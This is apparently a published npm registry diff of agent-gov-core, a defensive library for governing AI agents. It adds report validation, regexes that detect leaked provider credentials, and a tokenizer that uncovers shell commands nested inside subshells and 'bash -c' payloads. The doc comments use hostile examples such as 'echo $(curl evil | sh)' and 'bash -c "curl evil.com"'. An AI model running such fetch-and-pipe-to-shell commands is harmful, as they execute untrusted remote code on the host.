agent-gov-core 0.4.3 → 0.7.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,85 @@
1
+ import { type Finding, type Severity, type ToolKind } from './finding.js';
2
+ /** Canonical envelope version. */
3
+ export declare const REPORT_SCHEMA_VERSION: "1.0";
4
+ /**
5
+ * Canonical multi-tool report envelope. Wraps `Finding[]` with provenance,
6
+ * rating, and optional tool-specific extension data so a cross-tool
7
+ * meta-reviewer can ingest reports from N tools through one shape.
8
+ */
9
+ export interface Report {
10
+ schemaVersion: typeof REPORT_SCHEMA_VERSION;
11
+ tool: ToolKind;
12
+ toolVersion?: string;
13
+ runId?: string;
14
+ /**
15
+ * Identifier for the agent session, PR review, or thread this run belongs to.
16
+ * Distinct from `runId` (which identifies *this* tool run): one conversation
17
+ * can produce many runs. Matches OpenTelemetry's `gen_ai.conversation.id`
18
+ * semantic convention — if a consumer also emits OTel traces about the same
19
+ * agent session, pass the same string here and downstream tooling can cross-
20
+ * reference governance findings with the traces.
21
+ *
22
+ * @see https://opentelemetry.io/docs/specs/semconv/gen-ai/
23
+ */
24
+ conversationId?: string;
25
+ baseRef?: string;
26
+ headRef?: string;
27
+ /** Aggregate severity. `'none'` iff findings is empty or all below threshold. */
28
+ rating: 'none' | Severity;
29
+ findings: Finding[];
30
+ /** Tool-specific extension data (PolicyMesh `effectiveUnion`, CapabilityEcho `surfaceSummary`, etc). */
31
+ data?: Record<string, unknown>;
32
+ }
33
+ export interface CreateReportSpec {
34
+ tool: ToolKind;
35
+ toolVersion?: string;
36
+ runId?: string;
37
+ /** See {@link Report.conversationId}. */
38
+ conversationId?: string;
39
+ baseRef?: string;
40
+ headRef?: string;
41
+ findings: Finding[];
42
+ data?: Record<string, unknown>;
43
+ /**
44
+ * Explicit rating override. When omitted, `rating` is computed as the
45
+ * maximum severity across `findings` (or `'none'` if empty).
46
+ */
47
+ rating?: 'none' | Severity;
48
+ }
49
+ /**
50
+ * Build a {@link Report} with `schemaVersion` set and `rating` derived from
51
+ * the maximum finding severity (unless overridden). This is the recommended
52
+ * way to produce a report — sets the envelope version correctly and computes
53
+ * the rating consistently with other tools.
54
+ *
55
+ * @example
56
+ * const report = createReport({
57
+ * tool: 'scope_trail',
58
+ * toolVersion: '0.1.18',
59
+ * baseRef: 'abc123',
60
+ * headRef: 'def456',
61
+ * findings: [finding1, finding2],
62
+ * data: { mcpServers: [...] },
63
+ * });
64
+ */
65
+ export declare function createReport(spec: CreateReportSpec): Report;
66
+ /**
67
+ * Maximum severity across a finding list. Returns `'none'` for empty input.
68
+ * Used by {@link createReport} when no explicit rating is supplied.
69
+ */
70
+ export declare function maxSeverity(findings: readonly Finding[]): 'none' | Severity;
71
+ export interface ReportValidationResult {
72
+ ok: boolean;
73
+ errors: string[];
74
+ }
75
+ /**
76
+ * Runtime check that a value conforms to the canonical Report envelope.
77
+ * Aggregates errors across all findings — a single malformed finding does
78
+ * not short-circuit the rest of the envelope check.
79
+ *
80
+ * @example
81
+ * const result = validateReport(JSON.parse(reportJson));
82
+ * if (!result.ok) console.error(result.errors.join('\n'));
83
+ */
84
+ export declare function validateReport(value: unknown): ReportValidationResult;
85
+ //# sourceMappingURL=report.d.ts.map
package/dist/report.js ADDED
@@ -0,0 +1,156 @@
1
+ import { SEVERITIES, TOOL_KINDS, isSeverity, isToolKind, validateFinding, } from './finding.js';
2
+ /** Canonical envelope version. `createReport` stamps it on every report and `validateReport` rejects any other value. */
3
+ export const REPORT_SCHEMA_VERSION = '1.0';
4
+ /**
5
+ * Build a {@link Report} with `schemaVersion` set and `rating` derived from
6
+ * the maximum finding severity (unless overridden). This is the recommended
7
+ * way to produce a report — sets the envelope version correctly and computes
8
+ * the rating consistently with other tools.
9
+ * @returns A new report object; `findings` and `data` are the same references passed in `spec` (nothing is cloned).
10
+ * @example
11
+ * const report = createReport({
12
+ * tool: 'scope_trail',
13
+ * toolVersion: '0.1.18',
14
+ * baseRef: 'abc123',
15
+ * headRef: 'def456',
16
+ * findings: [finding1, finding2],
17
+ * data: { mcpServers: [...] },
18
+ * });
19
+ */
20
+ export function createReport(spec) {
21
+ const report = { // required fields first; optional ones are attached below only when defined
22
+ schemaVersion: REPORT_SCHEMA_VERSION,
23
+ tool: spec.tool,
24
+ rating: spec.rating ?? maxSeverity(spec.findings), // an explicit override wins; otherwise derived from the findings
25
+ findings: spec.findings, // stored by reference — the array is not copied
26
+ };
27
+ if (spec.toolVersion !== undefined)
28
+ report.toolVersion = spec.toolVersion;
29
+ if (spec.runId !== undefined)
30
+ report.runId = spec.runId;
31
+ if (spec.conversationId !== undefined)
32
+ report.conversationId = spec.conversationId;
33
+ if (spec.baseRef !== undefined)
34
+ report.baseRef = spec.baseRef;
35
+ if (spec.headRef !== undefined)
36
+ report.headRef = spec.headRef;
37
+ if (spec.data !== undefined)
38
+ report.data = spec.data; // stored by reference as well
39
+ return report;
40
+ }
41
+ /**
42
+ * Maximum severity across a finding list. Returns `'none'` for empty input.
43
+ * Used by {@link createReport} when no explicit rating is supplied. Ordering comes from `severityRank`.
44
+ */
45
+ export function maxSeverity(findings) {
46
+ let best = 'none'; // lowest rank, so any finding with a ranked severity replaces it
47
+ for (const f of findings) {
48
+ if (severityRank(f.severity) > severityRank(best)) // strict '>' keeps the first value seen at a given rank
49
+ best = f.severity;
50
+ }
51
+ return best;
52
+ }
53
+ function severityRank(s) { // maps a rating to a comparable number: none < low < medium < high < anything else
54
+ if (s === 'none')
55
+ return 0;
56
+ if (s === 'low')
57
+ return 1;
58
+ if (s === 'medium')
59
+ return 2;
60
+ if (s === 'high')
61
+ return 3;
62
+ return 4; // fall-through: every other value ranks highest (presumably 'critical' — confirm against SEVERITIES); unrecognized input lands here too
63
+ }
64
+ const REPORT_ALLOWED_KEYS = new Set([ // the only top-level keys validateReport accepts; any other key yields an "unknown property" error
65
+ 'schemaVersion',
66
+ 'tool',
67
+ 'toolVersion',
68
+ 'runId',
69
+ 'conversationId',
70
+ 'baseRef',
71
+ 'headRef',
72
+ 'rating',
73
+ 'findings',
74
+ 'data',
75
+ ]);
76
+ const RATING_VALUES = new Set(['none', ...SEVERITIES]); // every legal `rating`: 'none' plus each entry of SEVERITIES from finding.js
77
+ /**
78
+ * Runtime check that a value conforms to the canonical Report envelope.
79
+ * Aggregates errors across all findings — a single malformed finding does
80
+ * not short-circuit the rest of the envelope check.
81
+ * @returns `{ ok, errors }` — `ok` is true only when `errors` is empty.
82
+ * @example
83
+ * const result = validateReport(JSON.parse(reportJson));
84
+ * if (!result.ok) console.error(result.errors.join('\n'));
85
+ */
86
+ export function validateReport(value) {
87
+ const errors = [];
88
+ if (value === null || typeof value !== 'object' || Array.isArray(value)) {
89
+ return { ok: false, errors: ['report must be a plain object'] }; // the only early exit: no field can be inspected on a non-object
90
+ }
91
+ const v = value;
92
+ if (v.schemaVersion !== REPORT_SCHEMA_VERSION) {
93
+ errors.push(`schemaVersion must be '${REPORT_SCHEMA_VERSION}'`);
94
+ }
95
+ if (!isToolKind(v.tool)) {
96
+ errors.push(`tool must be one of: ${TOOL_KINDS.join(', ')}`);
97
+ }
98
+ if (typeof v.rating !== 'string' || !RATING_VALUES.has(v.rating)) {
99
+ errors.push(`rating must be one of: none, ${SEVERITIES.join(', ')}`);
100
+ }
101
+ if (!Array.isArray(v.findings)) {
102
+ errors.push('findings must be an array');
103
+ }
104
+ else {
105
+ for (let i = 0; i < v.findings.length; i++) {
106
+ const f = validateFinding(v.findings[i]);
107
+ if (!f.ok) {
108
+ errors.push(`findings[${i}]: ${f.errors.join('; ')}`); // one aggregated entry per malformed finding
109
+ }
110
+ else if (isToolKind(v.tool) && v.findings[i].tool !== v.tool) { // compared only when the finding is valid and report.tool is valid
111
+ errors.push(`findings[${i}].tool ('${v.findings[i].tool}') does not match report.tool ('${v.tool}')`);
112
+ }
113
+ }
114
+ }
115
+ if (v.toolVersion !== undefined && typeof v.toolVersion !== 'string') {
116
+ errors.push('toolVersion must be a string when present');
117
+ }
118
+ if (v.runId !== undefined && typeof v.runId !== 'string') {
119
+ errors.push('runId must be a string when present');
120
+ }
121
+ if (v.conversationId !== undefined && typeof v.conversationId !== 'string') {
122
+ errors.push('conversationId must be a string when present');
123
+ }
124
+ if (v.baseRef !== undefined && typeof v.baseRef !== 'string') {
125
+ errors.push('baseRef must be a string when present');
126
+ }
127
+ if (v.headRef !== undefined && typeof v.headRef !== 'string') {
128
+ errors.push('headRef must be a string when present');
129
+ }
130
+ if (v.data !== undefined && (v.data === null || typeof v.data !== 'object' || Array.isArray(v.data))) {
131
+ errors.push('data must be an object when present');
132
+ }
133
+ for (const key of Object.keys(v)) {
134
+ if (!REPORT_ALLOWED_KEYS.has(key))
135
+ errors.push(`unknown property: ${key}`);
136
+ }
137
+ // Cross-field consistency: a rating ABOVE the max finding severity is accepted,
138
+ // but a rating BELOW it is pushed as an error, so `ok` becomes false.
139
+ // NOTE(review): a tool that downgrades the rating by policy will fail this check — confirm that is intended.
140
+ if (Array.isArray(v.findings) &&
141
+ typeof v.rating === 'string' &&
142
+ RATING_VALUES.has(v.rating)) {
143
+ const findingsOk = v.findings.every((f) => validateFinding(f).ok); // re-runs validateFinding; the comparison is skipped if any finding is malformed
144
+ if (findingsOk) {
145
+ const implied = maxSeverity(v.findings);
146
+ if (severityRank(v.rating) < severityRank(implied)) {
147
+ errors.push(`rating '${v.rating}' is below the maximum finding severity '${implied}'`);
148
+ }
149
+ }
150
+ }
151
+ // NOTE(review): `void isSeverity` evaluates the imported binding and discards it;
152
+ // it performs no check on `rating`. Presumably kept so the import is not unused — confirm.
153
+ void isSeverity;
154
+ return { ok: errors.length === 0, errors };
155
+ }
156
+ //# sourceMappingURL=report.js.map
@@ -0,0 +1,67 @@
1
+ /**
2
+ * Hardcoded credential detection.
3
+ *
4
+ * Scans strings for provider-prefix tokens (Anthropic, OpenAI, GitHub, AWS,
5
+ * Slack, Google, GitLab, npm, Docker, Stripe) plus a length-restricted hex
6
+ * pattern that only fires in env/header context (a bare hex blob in a
7
+ * positional command argument is indistinguishable from a commit SHA).
8
+ *
9
+ * Contract: the literal credential is NEVER returned in any field. Callers
10
+ * receive only the provider label of the pattern that matched — never the
11
+ * regex or the matched text. This is the same contract PolicyMesh shipped
12
+ * the detector under, lifted into the substrate so every governance tool
13
+ * uses one source of truth for "what does a hardcoded credential look like."
14
+ *
15
+ * @example
16
+ * import { matchSecret } from 'agent-gov-core';
17
+ *
18
+ * matchSecret('sk-ant-abcdefghijklmnopqrstuv');
19
+ * // → { provider: 'Anthropic' }
20
+ *
21
+ * matchSecret('env:OPENAI_API_KEY');
22
+ * // → undefined (env var reference, not a literal)
23
+ *
24
+ * matchSecret('z'.repeat(40), { envOrHeaderContext: true });
25
+ * // → undefined (only 0-9, a-f and A-F are hex digits; 'z' is not, so this is not a hex token)
26
+ */
27
+ export interface SecretMatch {
28
+ /** Human-readable provider name. The literal credential is NEVER included. */
29
+ provider: string;
30
+ }
31
+ export interface MatchSecretOptions {
32
+ /**
33
+ * When `true`, patterns flagged `envOrHeaderOnly` are eligible. Set this
34
+ * only when scanning env values or HTTP header values — never when scanning
35
+ * a joined launch command (positional args often contain commit SHAs that
36
+ * would false-positive against a bare hex token pattern).
37
+ */
38
+ envOrHeaderContext?: boolean;
39
+ }
40
+ interface SecretPattern {
41
+ provider: string;
42
+ regex: RegExp;
43
+ /** See {@link MatchSecretOptions.envOrHeaderContext}. */
44
+ envOrHeaderOnly?: boolean;
45
+ }
46
+ /**
47
+ * Built-in provider patterns. Conservative — only shapes whose prefix
48
+ * unambiguously identifies a credential class. The bare hex pattern is gated
49
+ * to env/header context to avoid commit-SHA false positives.
50
+ *
51
+ * Stable as of v0.7.0 — additions are non-breaking, removals or shape changes
52
+ * require a major bump (the golden compatibility tests in `test/golden.test.mjs`
53
+ * pin the current provider set).
54
+ */
55
+ export declare const SECRET_PATTERNS: readonly Readonly<SecretPattern>[];
56
+ /**
57
+ * Scan `value` for a hardcoded provider credential. Returns the matched
58
+ * provider name (never the literal credential) or `undefined` when nothing
59
+ * matches.
60
+ *
61
+ * Set `options.envOrHeaderContext` to `true` only when scanning env values
62
+ * or HTTP header values — that enables the more permissive hex-token pattern
63
+ * which would false-positive on positional command arguments.
64
+ */
65
+ export declare function matchSecret(value: string, options?: MatchSecretOptions): SecretMatch | undefined;
66
+ export {};
67
+ //# sourceMappingURL=secrets.d.ts.map
@@ -0,0 +1,81 @@
1
+ /**
2
+ * Hardcoded credential detection.
3
+ *
4
+ * Scans strings for provider-prefix tokens (Anthropic, OpenAI, GitHub, AWS,
5
+ * Slack, Google, GitLab, npm, Docker, Stripe) plus a length-restricted hex
6
+ * pattern that only fires in env/header context (a bare hex blob in a
7
+ * positional command argument is indistinguishable from a commit SHA).
8
+ *
9
+ * Contract: the literal credential is NEVER returned in any field. Callers
10
+ * receive only the provider label of the pattern that matched — never the
11
+ * regex or the matched text. This is the same contract PolicyMesh shipped
12
+ * the detector under, lifted into the substrate so every governance tool
13
+ * uses one source of truth for "what does a hardcoded credential look like."
14
+ *
15
+ * @example
16
+ * import { matchSecret } from 'agent-gov-core';
17
+ *
18
+ * matchSecret('sk-ant-abcdefghijklmnopqrstuv');
19
+ * // → { provider: 'Anthropic' }
20
+ *
21
+ * matchSecret('env:OPENAI_API_KEY');
22
+ * // → undefined (env var reference, not a literal)
23
+ *
24
+ * matchSecret('z'.repeat(40), { envOrHeaderContext: true });
25
+ * // → undefined (only 0-9, a-f and A-F are hex digits; 'z' is not, so this is not a hex token)
26
+ */
27
+ /**
28
+ * Built-in provider patterns. Conservative — only shapes whose prefix
29
+ * unambiguously identifies a credential class. The bare hex pattern is gated
30
+ * to env/header context to avoid commit-SHA false positives. `matchSecret` tries entries in array order and returns the first hit.
31
+ *
32
+ * Stable as of v0.7.0 — additions are non-breaking, removals or shape changes
33
+ * require a major bump (the golden compatibility tests in `test/golden.test.mjs`
34
+ * pin the current provider set).
35
+ */
36
+ export const SECRET_PATTERNS = [
37
+ { provider: 'Anthropic', regex: /sk-ant-[A-Za-z0-9_-]{20,}/ },
38
+ { provider: 'OpenAI', regex: /sk-proj-[A-Za-z0-9_-]{20,}/ },
39
+ { provider: 'OpenAI', regex: /sk-(?!ant-|proj-)[A-Za-z0-9]{32,}/ }, // negative lookahead keeps the `sk-ant-` and `sk-proj-` prefixes out of this generic rule
40
+ { provider: 'GitHub', regex: /gh[pousr]_[A-Za-z0-9]{36,}/ },
41
+ { provider: 'GitHub', regex: /github_pat_[A-Za-z0-9_]{20,}/ },
42
+ { provider: 'Slack', regex: /xox[abprs]-[A-Za-z0-9-]{20,}/ },
43
+ { provider: 'AWS', regex: /AKIA[0-9A-Z]{16}/ },
44
+ { provider: 'Google', regex: /AIza[0-9A-Za-z_-]{35}/ },
45
+ { provider: 'GitLab', regex: /glpat-[A-Za-z0-9_-]{20,}/ },
46
+ { provider: 'npm', regex: /npm_[A-Za-z0-9]{36}/ },
47
+ { provider: 'Docker', regex: /dckr_pat_[A-Za-z0-9_-]{20,}/ },
48
+ { provider: 'Stripe', regex: /(?:sk|rk)_(?:live|test)_[A-Za-z0-9]{20,}/ },
49
+ // env/header context only (matchSecret skips it unless options.envOrHeaderContext is set): a run of 40+ hex characters, either case, not adjacent to other hex characters.
50
+ { provider: 'Hex token', regex: /(?:^|[^A-Fa-f0-9])([A-Fa-f0-9]{40,})(?:$|[^A-Fa-f0-9])/, envOrHeaderOnly: true },
51
+ ];
52
+ /**
53
+ * Prefix marking an environment-variable reference. Values starting with
54
+ * `env:` are not literal credentials — they're a reference resolved at
55
+ * runtime by the consuming tool (Codex notation). Skipped during scanning.
56
+ */
57
+ const ENV_REFERENCE_PREFIX = 'env:'; // matchSecret tests it with startsWith, so only a leading, exact-case `env:` is exempt
58
+ /**
59
+ * Scan `value` for a hardcoded provider credential. Returns the matched
60
+ * provider name (never the literal credential) or `undefined` when nothing
61
+ * matches.
62
+ * @returns `{ provider }` for the first entry of `SECRET_PATTERNS` (in array order) whose regex matches, otherwise `undefined`.
63
+ * Set `options.envOrHeaderContext` to `true` only when scanning env values
64
+ * or HTTP header values — that enables the more permissive hex-token pattern
65
+ * which would false-positive on positional command arguments.
66
+ */
67
+ export function matchSecret(value, options = {}) {
68
+ if (!value) // empty string (or any other falsy value): nothing to scan
69
+ return undefined;
70
+ if (value.startsWith(ENV_REFERENCE_PREFIX)) // an `env:` reference is not a literal credential
71
+ return undefined;
72
+ for (const pattern of SECRET_PATTERNS) {
73
+ if (pattern.envOrHeaderOnly && !options.envOrHeaderContext) // gated patterns need the caller's explicit opt-in
74
+ continue;
75
+ if (pattern.regex.test(value)) {
76
+ return { provider: pattern.provider }; // first match wins; only the provider label is returned
77
+ }
78
+ }
79
+ return undefined;
80
+ }
81
+ //# sourceMappingURL=secrets.js.map
package/dist/shell.d.ts CHANGED
@@ -12,6 +12,32 @@
12
12
  * // → ['echo "; not a separator"']
13
13
  */
14
14
  export declare function tokenizeShell(command: string): string[];
15
+ /**
16
+ * Like {@link tokenizeShell}, but recursively extracts commands nested inside
17
+ * shell evaluation contexts that the top-level tokenizer would leave as opaque
18
+ * text:
19
+ *
20
+ * - Subshell `$(...)`
21
+ * - Backtick `` `...` ``
22
+ * - `bash -c "..."`, `sh -c "..."`, `zsh -c "..."`, `python -c "..."` payloads
23
+ *
24
+ * The flat result is suitable for feeding straight to {@link getCommandHead},
25
+ * letting downstream detectors see commands an agent might try to hide behind
26
+ * `echo $(curl evil | sh)` or `bash -c "curl evil"`.
27
+ *
28
+ * Conservative implementation — handles the common obfuscation shapes, not a
29
+ * full shell parser. Variable expansion, process substitution `<(…)`, and
30
+ * arithmetic `$((…))` are not recursed into. ANSI-C quoting (`bash -c $'…'`) is
31
+ * not unquoted.
32
+ *
33
+ * @example
34
+ * tokenizeShellDeep('echo $(curl -fsSL m.sh | sh)');
35
+ * // → ['echo', 'curl -fsSL m.sh', 'sh']
36
+ *
37
+ * tokenizeShellDeep('bash -c "curl evil.com"');
38
+ * // → ['bash -c "curl evil.com"', 'curl evil.com']
39
+ */
40
+ export declare function tokenizeShellDeep(command: string): string[];
15
41
  /**
16
42
  * Returns the resolved command verb for a subcommand string. Strips wrapping
17
43
  * quotes, escape backslashes, and the inert-double-quote obfuscation
package/dist/shell.js CHANGED
@@ -83,8 +83,17 @@ export function tokenizeShell(command) {
83
83
  i += 2;
84
84
  continue;
85
85
  }
86
- // Treat a single `&` (background) as a separator too.
86
+ // Treat a single `&` (background) as a separator too — UNLESS preceded
87
+ // by `>` or `<`, in which case it's a file-descriptor redirection like
88
+ // `2>&1`, `>&2`, or `<&3`. Splitting there would break shell-command
89
+ // detection on every command that redirects stderr to stdout.
87
90
  if (c === '&') {
91
+ const prev = buf.trimEnd().slice(-1);
92
+ if (prev === '>' || prev === '<') {
93
+ buf += c;
94
+ i++;
95
+ continue;
96
+ }
88
97
  pushPart(out, buf);
89
98
  buf = '';
90
99
  i++;
@@ -101,6 +110,206 @@ function pushPart(out, part) {
101
110
  if (trimmed !== '')
102
111
  out.push(trimmed);
103
112
  }
113
+ /**
114
+ * Like {@link tokenizeShell}, but recursively extracts commands nested inside
115
+ * shell evaluation contexts that the top-level tokenizer would leave as opaque
116
+ * text:
117
+ *
118
+ * - Subshell `$(...)`
119
+ * - Backtick `` `...` ``
120
+ * - `bash -c "..."`, `sh -c "..."`, `zsh -c "..."`, `python -c "..."` payloads
121
+ *
122
+ * The flat result is suitable for feeding straight to {@link getCommandHead},
123
+ * letting downstream detectors see commands an agent might try to hide behind
124
+ * `echo $(curl evil | sh)` or `bash -c "curl evil"`.
125
+ *
126
+ * Conservative implementation — handles the common obfuscation shapes, not a
127
+ * full shell parser. Variable expansion, process substitution `<(…)`, and
128
+ * arithmetic `$((…))` are not recursed into. ANSI-C quoting (`bash -c $'…'`) is
129
+ * not unquoted.
130
+ *
131
+ * @example
132
+ * tokenizeShellDeep('echo $(curl -fsSL m.sh | sh)');
133
+ * // → ['echo', 'curl -fsSL m.sh', 'sh']
134
+ *
135
+ * tokenizeShellDeep('bash -c "curl evil.com"');
136
+ * // → ['bash -c "curl evil.com"', 'curl evil.com']
137
+ */
138
+ export function tokenizeShellDeep(command) {
139
+ const out = [];
140
+ const seen = new Set(); // de-duplicates output entries across every recursion level
141
+ const visit = (cmd, depth) => {
142
+ if (depth > 8)
143
+ return; // guard against pathological nesting
144
+ // Extract nested payloads from the WHOLE command first — `tokenizeShell`
145
+ // splits on `|` regardless of paren depth, so `$(curl m.sh | sh)` would
146
+ // already be cut in two by the time we tried to walk it for `$(…)`. NOTE(review): that also suggests the top-level pieces pushed below can be fragments (e.g. `echo $(curl m.sh`) — check the @example output.
147
+ const nested = extractNestedShellPayloads(cmd);
148
+ for (const sub of tokenizeShell(cmd)) { // this level's pieces are emitted first, in tokenizer order
149
+ if (!seen.has(sub)) {
150
+ seen.add(sub);
151
+ out.push(sub);
152
+ }
153
+ }
154
+ for (const n of nested) { // then each nested payload is tokenized one level deeper
155
+ visit(n, depth + 1);
156
+ }
157
+ };
158
+ visit(command, 0);
159
+ return out;
160
+ }
161
+ /**
162
+ * Return all shell-evaluation payloads embedded in a single subcommand:
163
+ * - `$(…)` and `` `…` `` bodies (paren/backtick balanced)
164
+ * - `(bash|sh|zsh|ksh|dash|ash|fish|python|python3|perl|ruby|node) -c <quoted-or-bare-arg>` payloads
165
+ * `-c` payloads are returned UNQUOTED (backslash escapes inside double quotes are resolved); `$(…)` and backtick bodies are returned raw.
166
+ */
167
+ function extractNestedShellPayloads(subcommand) {
168
+ const found = [];
169
+ const len = subcommand.length;
170
+ let i = 0;
171
+ let inSingle = false;
172
+ let inDouble = false;
173
+ // Pre-compiled here so we can use it inside the quote-aware walk.
174
+ const dashCMatcher = /^(?:bash|sh|zsh|ksh|dash|ash|fish|python3?|perl|ruby|node)\s+-c\s+/;
175
+ while (i < len) {
176
+ const c = subcommand[i];
177
+ // Plain single quotes: nothing inside is shell-interpreted
178
+ if (inSingle) {
179
+ if (c === "'")
180
+ inSingle = false;
181
+ i++;
182
+ continue;
183
+ }
184
+ if (c === "'") {
185
+ inSingle = true;
186
+ i++;
187
+ continue;
188
+ }
189
+ // Inside double quotes, `$(…)` and backticks STILL evaluate, so we
190
+ // keep scanning. Just remember to re-enable detection of an outer
191
+ // closing `"`. NOTE: backslash escapes are not tracked, so an escaped quote toggles the state too.
192
+ if (c === '"') {
193
+ inDouble = !inDouble;
194
+ i++;
195
+ continue;
196
+ }
197
+ // $(...) — NOTE(review): `$((…))` also enters this branch and its body is captured with the inner parentheses, although the public doc says arithmetic is not recursed into — confirm.
198
+ if (c === '$' && subcommand[i + 1] === '(') {
199
+ const body = readBalanced(subcommand, i + 2, '(', ')');
200
+ if (body !== null) {
201
+ found.push(body.content);
202
+ i = body.endIndex;
203
+ continue;
204
+ }
205
+ }
206
+ // Backticks — the body runs to the next backtick; escaped or nested backticks are not handled.
207
+ if (c === '`') {
208
+ const close = subcommand.indexOf('`', i + 1);
209
+ if (close !== -1) {
210
+ found.push(subcommand.slice(i + 1, close));
211
+ i = close + 1;
212
+ continue;
213
+ }
214
+ }
215
+ // `bash -c "..."` and friends — checked only OUTSIDE quoted regions so
216
+ // `echo "bash -c \"curl evil\""` (data, not a command) doesn't trigger.
217
+ // Match boundary: only at start-of-string OR after whitespace / a chain
218
+ // separator.
219
+ if (!inDouble) {
220
+ const atBoundary = i === 0 || /[\s;|&]/.test(subcommand[i - 1]);
221
+ if (atBoundary) {
222
+ const tail = subcommand.slice(i);
223
+ const dashCMatch = dashCMatcher.exec(tail);
224
+ if (dashCMatch) {
225
+ const afterFlag = i + dashCMatch[0].length;
226
+ const payload = readQuotedArg(subcommand, afterFlag);
227
+ if (payload !== null)
228
+ found.push(payload);
229
+ // Skip past the matched `bash -c ` prefix so the walk continues
230
+ // from the argument position; we don't try to compute where the
231
+ // quoted arg ends (the next iteration will hit the quote and toggle
232
+ // inDouble naturally).
233
+ i = afterFlag;
234
+ continue;
235
+ }
236
+ }
237
+ }
238
+ i++;
239
+ }
240
+ return found;
241
+ }
242
+ /** Read a balanced `open`/`close` body starting at `start` (already past the open). Returns `{ content, endIndex }` (`endIndex` is one past the closing delimiter) or `null` if the body never closes; delimiters inside single or double quotes are not counted. */
243
+ function readBalanced(input, start, open, close) {
244
+ let depth = 1; // the caller has already consumed one `open`
245
+ let i = start;
246
+ let inSingle = false;
247
+ let inDouble = false;
248
+ while (i < input.length) {
249
+ const c = input[i];
250
+ if (inSingle) {
251
+ if (c === "'")
252
+ inSingle = false;
253
+ i++;
254
+ continue;
255
+ }
256
+ if (c === "'") {
257
+ inSingle = true;
258
+ i++;
259
+ continue;
260
+ }
261
+ if (c === '"') {
262
+ inDouble = !inDouble;
263
+ i++;
264
+ continue;
265
+ }
266
+ if (!inDouble) {
267
+ if (c === open)
268
+ depth++;
269
+ else if (c === close) {
270
+ depth--;
271
+ if (depth === 0)
272
+ return { content: input.slice(start, i), endIndex: i + 1 }; // content excludes the closing delimiter
273
+ }
274
+ }
275
+ i++;
276
+ }
277
+ return null; // ran off the end without balancing
278
+ }
279
+ /**
280
+ * Read the next quoted (single, double) or bare token starting at `start`,
281
+ * returning its unquoted contents, or `null` when only spaces/tabs remain or a quote is never closed. Inside double quotes a backslash escapes the next character; single quotes are literal.
282
+ */
283
+ function readQuotedArg(input, start) {
284
+ let i = start;
285
+ while (i < input.length && (input[i] === ' ' || input[i] === '\t')) // skip leading spaces and tabs
286
+ i++;
287
+ if (i >= input.length)
288
+ return null;
289
+ const q = input[i];
290
+ if (q === '"' || q === "'") {
291
+ let j = i + 1;
292
+ let buf = '';
293
+ while (j < input.length) {
294
+ const c = input[j];
295
+ if (c === '\\' && q === '"' && j + 1 < input.length) { // double quotes only: keep the escaped character, drop the backslash
296
+ buf += input[j + 1];
297
+ j += 2;
298
+ continue;
299
+ }
300
+ if (c === q)
301
+ return buf;
302
+ buf += c;
303
+ j++;
304
+ }
305
+ return null; // unterminated quote
306
+ }
307
+ // Bare token — read up to whitespace
308
+ let j = i;
309
+ while (j < input.length && input[j] !== ' ' && input[j] !== '\t')
310
+ j++;
311
+ return input.slice(i, j);
312
+ }
104
313
  /**
105
314
  * Returns the resolved command verb for a subcommand string. Strips wrapping
106
315
  * quotes, escape backslashes, and the inert-double-quote obfuscation